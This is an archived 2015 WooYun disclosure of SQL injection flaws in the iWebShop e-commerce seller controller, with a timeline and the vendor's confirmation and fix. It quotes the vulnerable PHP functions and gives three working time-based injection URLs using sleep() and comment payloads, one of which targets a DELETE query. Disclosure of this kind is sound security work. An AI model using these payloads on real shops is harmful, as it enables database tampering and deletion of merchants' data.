乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-01: 细节已通知厂商并且等待厂商处理中 2015-04-01: 厂商已经确认,细节仅向厂商公开 2015-04-04: 细节向第三方安全合作伙伴开放 2015-05-26: 细节向核心白帽子及相关领域专家公开 2015-06-05: 细节向普通白帽子公开 2015-06-15: 细节向实习白帽子公开 2015-06-30: 细节向公众公开
rt
看到\controllers\seller.php
public function goods_report() { $seller_id = $this->seller['seller_id']; $condition = Util::search(IReq::get('search'));//获取search //var_dump($condition); $where = 'go.seller_id='.$seller_id; $where .= $condition ? " and ".$condition : ""; $goodHandle = new IQuery('goods as go'); $goodHandle->order = "go.id desc"; $goodHandle->fields = "go.*"; $goodHandle->where = $where; $goodList = $goodHandle->find(); //构建 Excel table; $strTable ='<table width="500" border="1">'; $strTable .= '<tr>'; $strTable .= '<td style="text-align:center;font-size:12px;">商品名称</td>'; $strTable .= '<td style="text-align:center;font-size:12px;" width="160">分类</td>'; $strTable .= '<td style="text-align:center;font-size:12px;" width="60">售价</td>'; $strTable .= '<td style="text-align:center;font-size:12px;" width="60">库存</td>'; $strTable .= '</tr>'; foreach($goodList as $k=>$val){ $strTable .= '<tr>'; $strTable .= '<td style="text-align:center;font-size:12px;"> '.$val['name'].'</td>'; $strTable .= '<td style="text-align:left;font-size:12px;">'.goods_class::getGoodsCategory($val['id']).' </td>'; $strTable .= '<td style="text-align:left;font-size:12px;">'.$val['sell_price'].' </td>'; $strTable .= '<td style="text-align:left;font-size:12px;">'.$val['store_nums'].' </td>'; $strTable .= '</tr>'; } $strTable .='</table>'; unset($goodList); $reportObj = new report(); $reportObj->setFileName('goods'); $reportObj->toDownload($strTable); exit(); } //商品删除 public function goods_del() { //post数据 $id = IFilter::act(IReq::get('id'));//获取id //生成goods对象 $goods = new goods_class(); $goods->seller_id = $this->seller['seller_id']; if($id) { if(is_array($id)) { foreach($id as $key => $val) { $goods->del($val);//进入sql } } else { $goods->del($id); } } $this->redirect("goods_list"); } //商品状态修改 public function goods_status() { $id = IFilter::act(IReq::get('id'));//获取id $is_del = IFilter::act(IReq::get('is_del'),'int'); $is_del = $is_del === 0 ? 3 : $is_del; //不能等于0直接上架 $seller_id = $this->seller['seller_id']; $goodsDB = new IModel('goods'); $goodsDB->setData(array('is_del' => $is_del)); if($id) { if(is_array($id))//如果id是数组就进入sql { foreach($id as $key => $val) { $goodsDB->update("id = ".$val." and seller_id = ".$seller_id); } } else { $goodsDB->update("id = ".$val." and seller_id = ".$seller_id); } } $this->redirect("goods_list"); }
我们跟入search函数
public static function search($search) { if(!$search) { return ''; }var_dump($search); $where = array(); //like子句处理 if(isset($search['like']) && $search['likeValue']) { $where[] = $search['like']." like '%".$search['likeValue']."%'"; } unset($search['like']); unset($search['likeValue']); //自定义子句处理 foreach($search as $key => $val) { if($val === '') { continue; } if(strpos($key,'num') !== false) { $where[] = $key.$val; } else { $where[] = $key."'".$val."'"; } } return join(" and ",$where); }
可以看到$key没有单引号就进入sql了。首先注册一个商铺。注入#1然后访问
http://127.0.0.1/iwebshop3.1.15030300/iwebshop/index.php?controller=seller&action=goods_report&search[sleep(2)%23]=aaaa
看到mysql日志
执行成功注入#2我们看到del函数
public function del($where) { $where = (strtolower($where) == 'all') ? '' : ' WHERE '.$where; $sql = 'DELETE FROM '.$this->tableName.$where; return $this->db->query($sql); }
也是无单引号,直接进入。我们访问
http://127.0.0.1/iwebshop3.1.15030300/iwebshop/index.php?controller=seller&action=goods_del&id=1/**/or/**/sleep(2)%23
然后看到mysql日志
注入#3我们访问
http://127.0.0.1/iwebshop3.1.15030300/iwebshop/index.php?controller=seller&action=goods_status&id[]=sleep(5)%23
成功执行
然后随便用了个脚本跑了一下
单引号,或者int
危害等级:中
漏洞Rank:10
确认时间:2015-04-01 20:08
感谢测试!我们已经进行了修复处理
暂无
